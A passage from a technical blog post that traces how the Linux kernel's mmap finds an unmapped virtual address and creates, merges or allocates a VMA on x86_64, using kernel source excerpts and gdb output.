</span></span><span class="line"><span class="cl">    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
</span></span><span class="line"><span class="cl">#2  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at mm/huge_memory.c:937
</span></span><span class="line"><span class="cl">#3  thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at mm/huge_memory.c:926
</span></span><span class="line"><span class="cl">#4  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    pgoff=&lt;optimized out&gt;, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
</span></span><span class="line"><span class="cl">#5  0xffffffff8124725d in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, addr@entry=0, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc9000076bee8, uf=0xffffc9000076bef0)
</span></span><span class="line"><span class="cl">    at mm/mmap.c:1325
</span></span><span class="line"><span class="cl">#6  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
</span></span><span class="line"><span class="cl">#7  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc9000076bf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
</span></span><span class="line"><span class="cl">#8  do_syscall_64 (regs=0xffffc9000076bf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
</span></span><span class="line"><span class="cl">#9  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121
</span></span></code></pre></div><p>We made it! Okay, let&rsquo;s dig into how the address is fetched by walking through the function. There are various checks but for brevity I will focus on the addr finding:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span>
</span></span><span class="line"><span class="cl"><span class="nf">arch_get_unmapped_area_topdown_vmflags</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">filp</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr0</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">vm_flags_t</span> <span class="n">vm_flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">mm</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">addr0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">vm_unmapped_area_info</span> <span class="n">info</span> <span class="o">=</span> <span class="p">{};</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">MAP_FIXED</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></p>
<p>If <code>MAP_FIXED</code> is set, <code>addr</code> is returned as-is, no questions asked.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">addr</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">addr</span> <span class="o">&amp;=</span> <span class="n">PAGE_MASK</span><span class="p">;</span>                              <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">mmap_address_hint_valid</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">))</span>        <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">get_unmapped_area</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">vma</span> <span class="o">=</span> <span class="nf">find_vma</span><span class="p">(</span><span class="n">mm</span><span class="p">,</span> <span class="n">addr</span><span class="p">);</span>                       <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">vma</span> <span class="o">||</span> <span class="n">addr</span> <span class="o">+</span> <span class="n">len</span> <span class="o">&lt;=</span> <span class="nf">vm_start_gap</span><span class="p">(</span><span class="n">vma</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>                            <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></p>
<p>If a hint is set (i.e. <code>addr != 0</code>) then the function will check if that address range is free. It does this by first making sure the <code>addr</code> is page aligned [0] and does <em>another</em> validation check on the <code>addr</code> [1]. The comment for <code>[mmap_address_hint_valid()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/mmap.c#L209)</code> does a good job describing why this check is needed!</p>
<p>To check if the address range our new mapping will use is free, it calls <code>[find_vma()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2014)</code> [2] - this function returns the first memory region at or AFTER <code>addr</code> in our <code>mm</code>. If no mapping is returned (<code>!vma</code>) then the address space after <code>addr</code> is free and we&rsquo;re good to go.</p>
<p>However, if there is a mapping somewhere at or after <code>addr</code>, we need to make sure it starts AFTER the end of our new mapping. It does this by comparing where our new mapping will end  (<code>addr + len</code>) and the start address of the <code>vma</code> (<code>[vm_start_gap(vma)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3513)</code>; the <code>gap</code> part is because the function factors in any potential padding). If there&rsquo;s no overlap, our mapping&rsquo;s area is unmapped and we can use the hint! [3]</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">vm_unmapped_area_info</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">;</span>        <span class="c1">// informs search behaviour
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">length</span><span class="p">;</span>       <span class="c1">// length of the mapping in bytes
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">low_limit</span><span class="p">;</span>    <span class="c1">// lowest vaddr to start at
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">high_limit</span><span class="p">;</span>   <span class="c1">// highest vaddr to end at
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">align_mask</span><span class="p">;</span>   <span class="c1">// alignment mask the addr must satisfy
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">align_offset</span><span class="p">;</span> <span class="c1">// 
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">start_gap</span><span class="p">;</span>    <span class="c1">// minimum gap required before mapping
</span></span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443">include/linux/mm.h</a></p>
<p>If the hint isn&rsquo;t valid or overlaps an existing mapping, the function will proceed to the <code>get_unmapped_area</code> label which will populate the <code>[struct vm_unmapped_area_info](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443)</code>, which describes the properties and constraints of our new mapping.</p>
<p>Remember, as we&rsquo;re searching topdown, <code>high_limit</code> defines the start point (base) for our search. So how is this calculated? By default, the function will use the value that is handily stored in <code>mm-&gt;mmap_base</code> (the base user vaddr for topdown allocations). But what is this?</p>
<p><img src="https://sam4k.com/content/images/2025/04/image.png" alt=""></p>
<p>From <a href="https://www.slideshare.net/slideshow/process-address-space-the-way-to-create-virtual-address-page-table-of-userspace-application-251425396/251425396#3">these slides</a> by Adrian Huang</p>
<p>Let&rsquo;s remind ourselves of the x86_64 process virtual address space. We can see that <code>mm-&gt;mmap_base</code> sits at the upper end of the address space, just below the stack (and its guard gap). This diagram is the &ldquo;canonical&rdquo; address space and assumes a typical 47-bits (out of the 64, on a 64-bit system) are used for the virtual address.</p>
<p>However, more bits may be used for the virtual address on some systems. So while the implementation defaults to <code>mmap_base</code> as the <code>high_limit</code>, if the hint is outside of this window, then the <code>high_limit</code> will instead be set to the true upper bounds of the user virtual address space (where <code>TASK_SIZE_MAX</code> defines the size virtual user address space).</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="n">info</span><span class="p">.</span><span class="n">high_limit</span> <span class="o">=</span> <span class="nf">get_mmap_base</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * If hint address is above DEFAULT_MAP_WINDOW, look for unmapped area
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * in the full address space.
</span></span></span><span class="line"><span class="cl"><span class="cm">	 *
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * !in_32bit_syscall() check to avoid high addresses for x32
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * (and make it no op on native i386).
</span></span></span><span class="line"><span class="cl"><span class="cm">	 */</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">addr</span> <span class="o">&gt;</span> <span class="n">DEFAULT_MAP_WINDOW</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nf">in_32bit_syscall</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">		<span class="n">info</span><span class="p">.</span><span class="n">high_limit</span> <span class="o">+=</span> <span class="n">TASK_SIZE_MAX</span> <span class="o">-</span> <span class="n">DEFAULT_MAP_WINDOW</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></p>
<p>The <code>info</code> structure is then passed to <code>[vm_unmapped_area(&amp;info)](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1765)</code> which will do the search. As we specify <code>VM_UNMAPPED_AREA_TOPDOWN</code> in <code>flags</code>, it uses the <code>[unmapped_area_topdown(info)](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714)</code> implementation.</p>
<p>Using the magic of gdb, we can set a breakpoint to examine the <code>info</code> structure for our program&rsquo;s mapping to make sure everything aligns with our understanding:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) p/x *((struct vm_unmapped_area_info*)info)
</span></span><span class="line"><span class="cl">$2 = {
</span></span><span class="line"><span class="cl">  flags = VM_UNMAPPED_AREA_TOPDOWN, 
</span></span><span class="line"><span class="cl">  length = 0x1000,                  // our mapping len
</span></span><span class="line"><span class="cl">  low_limit = 0x1000,               // default low_limit
</span></span><span class="line"><span class="cl">  high_limit = 0x7f4bc62a3000,      // mmap_base (highest bit set is 47)
</span></span><span class="line"><span class="cl">  align_mask = 0x0, 
</span></span><span class="line"><span class="cl">  align_offset = 0x0, 
</span></span><span class="line"><span class="cl">  start_gap = 0x0
</span></span><span class="line"><span class="cl">}
</span></span></code></pre></div><p>Now <code>unmapped_area_topdown()</code> has all the information it needs to search the address space from <code>high_limit</code> to <code>low_limit</code>, looking for a gap that fits our mapping of <code>len</code> (taking into account any alignment or gaps required before the mapping):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
</span></span><span class="line"><span class="cl">{
</span></span><span class="line"><span class="cl">	// SNIP
</span></span><span class="line"><span class="cl">	VMA_ITERATOR(vmi, current-&gt;mm, 0);
</span></span><span class="line"><span class="cl">		
</span></span><span class="line"><span class="cl">	// SNIP
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	if (vma_iter_area_highest(&amp;vmi, low_limit, high_limit, length))
</span></span><span class="line"><span class="cl">		return -ENOMEM;
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	gap = vma_iter_end(&amp;vmi) - info-&gt;length;
</span></span><span class="line"><span class="cl">	gap -= (gap - info-&gt;align_offset) &amp; info-&gt;align_mask;
</span></span><span class="line"><span class="cl">	gap_end = vma_iter_end(&amp;vmi);
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714">mm/mmap.c</a></p>
<p>Remember those maples trees we spoke about at the beginning? Well now it&rsquo;s all going to come in handy! <code>[VMA_ITERATOR()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L1114)</code> is a macro used to initialise an iterator, <code>vmi</code>, for iterating (!) the vmas of a process (our <code>current-&gt;mm</code> in this case).</p>
<p>The main logic is then handled by the handy <code>[vma_iter_area_highest()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1411)</code>. This function wraps the advanced maple tree API, <code>mas_empty_area_rev()</code>, to find the first gap (i.e. a range not spanned by a node/vma) of <code>length</code> bytes, working from <code>high_limit</code> down to <code>low_limit</code>. And just like that we&rsquo;ve done our topdown search!</p>
<p>There are then some additional checks to make sure it conforms with the supplied <code>info</code> plus some additional error cases but that&rsquo;s the general gist of it. We did it! That&rsquo;s how we find an unused virtual address for our mapping &hellip; at least for the default topdown case on an x86_64 system &hellip;</p>
<p>For context, this is where we are in the callstack at this point:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">#0  0xffffffff81243e86 in unmapped_area_topdown (info=&lt;optimized out&gt;) at mm/mmap.c:1719
</span></span><span class="line"><span class="cl">#1  vm_unmapped_area (info=info@entry=0xffffc900004b7d80) at mm/mmap.c:1770
</span></span><span class="line"><span class="cl">#2  0xffffffff81037ce5 in arch_get_unmapped_area_topdown_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr0=0, len=4096, pgoff=0, flags=34, 
</span></span><span class="line"><span class="cl">    vm_flags=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:219
</span></span><span class="line"><span class="cl">#3  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=&lt;optimized out&gt;, filp=filp@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, 
</span></span><span class="line"><span class="cl">    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
</span></span><span class="line"><span class="cl">#4  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at mm/huge_memory.c:937
</span></span><span class="line"><span class="cl">#5  thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at mm/huge_memory.c:926
</span></span><span class="line"><span class="cl">#6  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    pgoff=&lt;optimized out&gt;, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
</span></span><span class="line"><span class="cl">#7  0xffffffff8124725d in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, addr@entry=0, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc900004b7ee8, uf=0xffffc900004b7ef0)
</span></span><span class="line"><span class="cl">    at mm/mmap.c:1325
</span></span><span class="line"><span class="cl">#8  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
</span></span><span class="line"><span class="cl">#9  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900004b7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
</span></span><span class="line"><span class="cl">#10 do_syscall_64 (regs=0xffffc900004b7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
</span></span></code></pre></div><p>We&rsquo;re going to head back up to <code>do_mmap()</code> and cover the final bit of logic for the mapping process: <code>mmap_region()</code>.</p>
<h3 id="mmapregion"><code>mmap_region()</code></h3>
<p><img src="https://sam4k.com/content/images/2025/04/this_is_it.gif" alt=""></p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1468">mm/mmap.c</a></p>
<p>Okay! Can you believe we&rsquo;re still on the first system call of our &ldquo;simple&rdquo; program?! There&rsquo;s not long left now though! We&rsquo;re back in <code>do_mmap()</code> and the pieces are set:</p>
<ul>
<li><code>file</code> is NULL as we&rsquo;re mapping anonymous memory, not a file, in our address space</li>
<li><code>addr</code>, as we&rsquo;ve just painstakingly discovered, now contains a suitable virtual address for our mapping</li>
<li><code>len</code> is the length of our mapping in bytes</li>
<li><code>vm_flags</code> has been populated in <code>do_mmap()</code> from a combination of the <code>prot</code> and <code>flags</code> we passed to <code>mmap()</code> as well as the <code>mm-&gt;def_flags</code></li>
<li><code>pgoff</code> is zero, right? hah, well &hellip; for anonymous <code>MAP_PRIVATE</code> mappings, <code>do_mmap()</code> will set <code>pgoff = addr &gt;&gt; PAGE_SHIFT;</code>. But <code>pgoff</code> is for file offsets, and we&rsquo;re not mapping a file?! The tl;dr here is this acts as an identifier for anonymous vmas (I&rsquo;m sure we&rsquo;ll touch on this later).</li>
<li><code>uf</code>, the userfault list stuff, is still untouched and probably still out of scope for the post</li>
</ul>
<p>Now we&rsquo;re ready to jump into <code>mmap_region()</code>! The goal of this function is to do the actual &ldquo;mapping&rdquo; part of <code>mmap()</code>, which essentially means making sure our mapping (<code>len</code> bytes at <code>addr</code> with <code>vm_flags</code> properties) is represented by a <code>struct vm_area_struct</code> and stored in the <code>mm-&gt;mm_mt</code>. Sounds simple enough, right?</p>
<p>Well &hellip; as you might expect, there are a lot of cases, edge cases and validation that needs to be done to do this correctly. For now we&rsquo;ll continue to focus on those relating specifically to anonymous mappings and our case study.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">unsigned long mmap_region(struct file *file, unsigned long addr,
</span></span><span class="line"><span class="cl">		unsigned long len, vm_flags_t vm_flags, unsigned long pgoff,
</span></span><span class="line"><span class="cl">		struct list_head *uf)
</span></span><span class="line"><span class="cl">{
</span></span><span class="line"><span class="cl">	struct mm_struct *mm = current-&gt;mm;
</span></span><span class="line"><span class="cl">	struct vm_area_struct *vma = NULL;
</span></span><span class="line"><span class="cl">	struct vm_area_struct *next, *prev, *merge;
</span></span><span class="line"><span class="cl">// SNIP
</span></span><span class="line"><span class="cl">	VMA_ITERATOR(vmi, mm, addr);
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>Right off the bat we can see the <code>VMA_ITERATOR()</code> macro again, which will be doing a lot of heavy lifting in this function for navigating the <code>mm-&gt;mm_t</code> maple tree. Note that it&rsquo;s initialised with our <code>addr</code>, so the iterator will be initialised with <code>addr</code> as its index.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">	/* Check against address space limit. */
</span></span><span class="line"><span class="cl">	if (!may_expand_vm(mm, vm_flags, len &gt;&gt; PAGE_SHIFT)) {
</span></span><span class="line"><span class="cl">		unsigned long nr_pages;
</span></span><span class="line"><span class="cl">		// SNIP     
</span></span><span class="line"><span class="cl">	}
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	/* Unmap any existing mapping in the area */
</span></span><span class="line"><span class="cl">	error = do_vmi_munmap(&amp;vmi, mm, addr, len, uf, false);
</span></span><span class="line"><span class="cl">	// SNIP
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>Next we do some housekeeping. First is a check to make sure &ldquo;the calling process may expand its vm space by the passed number of pages&rdquo; ( <code>len &gt;&gt; PAGE_SHIFT</code> is a quick way to convert <code>len</code> bytes to the page count equivalent). This involves checking against any resource limits.</p>
<p>Then, we hit a quirk of <code>MAP_FIXED</code> behaviour we touched one earlier. Notably, when looking for an unmapped area, by default we&rsquo;ll get an <code>addr</code> that does not overlap any existing mappings for <code>len</code> bytes. However, if <code>MAP_FIXED</code> is passed, it will just use the <code>addr</code> passed by the user (as long as its valid), regardless of overlaps.</p>
<p>If it does overlap any existing mappings, these will get unmapped. This behaviour is implemented by <code>do_vmi_munmap()</code>, which uses the vma iterator to unmap any vmas whose start address lies in <code>addr</code> to <code>addr + len</code>. Note mappings can be &ldquo;sealed&rdquo;<a href="https://www.kernel.org/doc/html/next/userspace-api/mseal.html">[2]</a> and can&rsquo;t be unmapped like this, causing the current <code>mmap()</code> to fail.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="n">next</span> <span class="o">=</span> <span class="nf">vma_next</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">prev</span> <span class="o">=</span> <span class="nf">vma_prev</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">);</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>Next, the iterator is used to fetch first vma from where the iterator starts (i.e. the next vma after <code>addr</code>) and the first vma prior to where the iterator stars (i.e. the first vma before <code>addr</code>). <code>mmap_region()</code> will then check the following cases:</p>
<ul>
<li>Can we merge the new mapping with the <code>next</code> vma instead of creating a new <code>vma</code>?</li>
<li>Can we merge the new OR merged mapping with the <code>prev</code> vma?</li>
<li>Some mappings, denoted by <code>VM_SPECIAL</code>, can&rsquo;t be merged.</li>
<li>If no merging is possible, allocate a new <code>vma</code>, initialise it and insert it into the <code>mm-&gt;mm_mt</code></li>
</ul>
<h4 id="vma-merging">VMA Merging</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">	/* Attempt to expand an old mapping */
</span></span><span class="line"><span class="cl">	/* Check next */
</span></span><span class="line"><span class="cl">	if (next &amp;&amp; next-&gt;vm_start == end &amp;&amp; !vma_policy(next) &amp;&amp;
</span></span><span class="line"><span class="cl">	    can_vma_merge_before(next, vm_flags, NULL, file, pgoff+pglen,
</span></span><span class="line"><span class="cl">				 NULL_VM_UFFD_CTX, NULL)) {
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>A few things need to be checked to determine if we can expand an existing vma, instead of allocating a new <code>struct vm_area_struct</code> for our new mapping.</p>
<p>Let&rsquo;s look at the first case: can we merge the new mapping with the <code>next</code> vma? First, there needs to be a <code>next</code> mapping and it needs to be adjacent to where our new mapping would go (i.e. the end of our new mapping, is the start of <code>next</code>).</p>
<p>Then <code>![vma_policy(next)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L765)</code> makes sure <code>next</code> doesn&rsquo;t have it&rsquo;s own specific NUMA policy (memory stuff, stored in <code>vma-&gt;vm_policy</code>). Finally <code>[can_vma_merge_before()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L813)</code> carries out this remaining checks, which basically involves:</p>
<ul>
<li>Checking if the <code>vm_flags</code>, <code>file</code> etc. are compatible. Also, if it has it&rsquo;s own <code>vma-&gt;vm_ops-&gt;close</code> to be called when the vma is closed, it won&rsquo;t be merged.</li>
<li>If <code>next</code> is an anonymous vma cloned from a parent process, it won&rsquo;t be merged.</li>
</ul>
<p>If these checks are passed, <code>next</code> will be expanded to include our new mapping. Either way, similar checks will then be made for <code>prev</code>. If those checks pass, either:</p>
<ul>
<li><code>next</code> didn&rsquo;t merge, in which case we&rsquo;ll expand <code>prev</code> to include the new mapping</li>
<li><code>next</code> did merge, in which case <code>prev</code> will be expanded to include the new mapping AND <code>next</code>.</li>
</ul>
<p>If these checks fail a vma will be allocated for our new mapping.</p>
<h4 id="vma-allocation">VMA Allocation</h4>
<p><img src="https://sam4k.com/content/images/2025/04/lonely.gif" alt=""></p>
<p>So, there&rsquo;s no one for our mapping to merge with. In this case, a new vma will be allocated, initialised and insert into the <code>mm-&gt;mm_mt</code> tree:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="n">vma</span> <span class="o">=</span> <span class="nf">vm_area_alloc</span><span class="p">(</span><span class="n">mm</span><span class="p">);</span>                           <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="nf">vma_iter_config</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">end</span><span class="p">);</span>                  <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vma_set_range</span><span class="p">(</span><span class="n">vma</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">end</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">);</span>              <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vm_flags_init</span><span class="p">(</span><span class="n">vma</span><span class="p">,</span> <span class="n">vm_flags</span><span class="p">);</span>                      <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_page_prot</span> <span class="o">=</span> <span class="nf">vm_get_page_prot</span><span class="p">(</span><span class="n">vm_flags</span><span class="p">);</span>    <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>                                        <span class="p">[</span><span class="mi">5</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">vm_flags</span> <span class="o">&amp;</span> <span class="n">VM_SHARED</span><span class="p">)</span> <span class="p">{</span>                 <span class="p">[</span><span class="mi">6</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>                                           <span class="p">[</span><span class="mi">7</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="nf">vma_set_anonymous</span><span class="p">(</span><span class="n">vma</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
